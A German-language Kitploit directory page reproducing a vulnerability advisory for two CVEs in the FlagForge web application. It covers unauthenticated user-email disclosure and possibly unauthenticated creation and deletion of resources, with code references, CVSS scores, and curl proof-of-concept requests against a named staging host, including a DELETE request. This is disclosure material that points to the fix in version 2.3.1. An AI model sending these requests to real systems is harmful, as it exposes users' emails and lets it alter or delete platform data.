Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-59843-CVE-2025-59932 — CVE auf FlagForge in den Versionen 2.0.0 bis 2.3.0. Führen Sie ein Upgrade auf Version 2.3.1 durch, um das Problem zu beheben. | Kitploit
Tools/GitHubGitHub/at0mxploit/cve-2025-59843-cve-2025-59932
SchwachstellenanalyseInformationsbeschaffungWebsicherheitPenetrationstestsFehlkonfigurationAPI-Sicherheit
GitHubat0mxploit/cve-2025-59843-cve-2025-59932

CVE-2025-59843-CVE-2025-59932

CVE auf FlagForge in den Versionen 2.0.0 bis 2.3.0. Führen Sie ein Upgrade auf Version 2.3.1 durch, um das Problem zu beheben.

Repository anzeigen
13vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-59843 & CVE-2025-59932

1. Öffentliche Preisgabe von Benutzer-E-Mail-Adressen CVE-2025-59843

Im Geltungsbereich / Betroffene Anwendung: FlagForge Webanwendung

API-Endpunkt: /api/user/[username]

Details: Der Endpunkt gibt E-Mail-Adressen von Benutzern ohne Authentifizierung zurück. Jeder Benutzername kann öffentlich abgefragt werden.

Grundursache / Code-Referenz:

root@kitploit:~
const user = await UserSchema.findOne({
  name: { $regex: new RegExp(`^${username}$`, 'i') }
}).select('name email image totalScore customBadges createdAt role');

// No authentication check is performed
email: user.email, // Exposed publicly

Schweregrad (CVSS v4.0): 5.5 (Mittel)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:P/CR:M/IR:L/AR:L/MAV:N/MAC:L/MAT:N/MPR:N/MUI:N/MVC:L/MVI:N/MVA:N/MSC:L/MSI:N/MSA:N/AU:Y/RE:L

Auswirkung: Angreifer können Benutzer enumerieren und auf E-Mail-Adressen zugreifen, was zu möglichen Datenschutzverletzungen führt.

Proof of Concept (PoC):

root@kitploit:~
curl "https://staging.flagforge.xyz/api/user/No%20Reply"
Beispielantwort:

{
  "success": true,
  "user": {
    "name": "No Reply",
    "email": "<REDACTED>",
    ...
  }
}

2. Potenzielle nicht authentifizierte Ressourcenänderung/-löschung CVE-2025-59932

Im Geltungsbereich / Betroffene Anwendung: FlagForge Webanwendung

API-Endpunkt: /api/resources

Details:

GET /api/resources macht alle Ressourcen öffentlich zugänglich.

Basierend auf der Code-Überprüfung erzwingen POST- und DELETE-Anfragen keine Authentifizierung oder Autorisierung. Diese Anfragen wurden nicht auf dem Live-System getestet, um Produktionsdaten nicht zu beeinträchtigen.

Beobachtete Header (OPTIONS-Anfrage):

root@kitploit:~
❯ curl -i -X OPTIONS "https://staging.flagforge.xyz/api/resources"
HTTP/2 204
access-control-allow-origin: https://staging.flagforge.xyz
allow: DELETE, GET, HEAD, OPTIONS, POST
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
date: Thu, 25 Sep 2025 15:03:45 GMT
permissions-policy: geolocation=(), microphone=(), camera=(), payment=()
pragma: no-cache
referrer-policy: no-referrer
server: Vercel
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch
x-content-type-options: nosniff
x-frame-options: DENY
x-matched-path: /api/resources
x-vercel-cache: MISS
x-vercel-id: bom1::iad1::v7k72-1758812623945-4e3fad4b58b4
x-xss-protection: 1; mode=block

Schweregrad (CVSS v4.0, falls POST/DELETE nicht authentifiziert sind): 7.8 (Hoch)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/E:U/CR:M/IR:H/AR:M/MAV:N/MAC:L/MAT:N/MPR:N/MUI:N/MVC:L/MVI:H/MVA:L/MSC:L/MSI:H/MSA:L/S:N/AU:Y/RE:M/U:Red

Auswirkung: Wenn POST oder DELETE nicht authentifiziert sind, könnte ein Angreifer potenziell Ressourcen erstellen oder löschen, was die Integrität der Plattform beeinträchtigt.

Proof of Concept (PoC):

root@kitploit:~
curl -X GET "https://staging.flagforge.xyz/api/resources"

Dadurch erhalten Sie die _id der Ressourcen.

root@kitploit:~
curl -X POST "https://staging.flagforge.xyz/api/resources" \
-H "Content-Type: application/json" \
-d '{"title":"Test","description":"Test","category":"Web","resourceLink":"https://example.com","uploadedBy":"tester"}'
root@kitploit:~
curl -X DELETE "https://staging.flagforge.xyz/api/resources?id=<resource-id>"

Tool herunterladen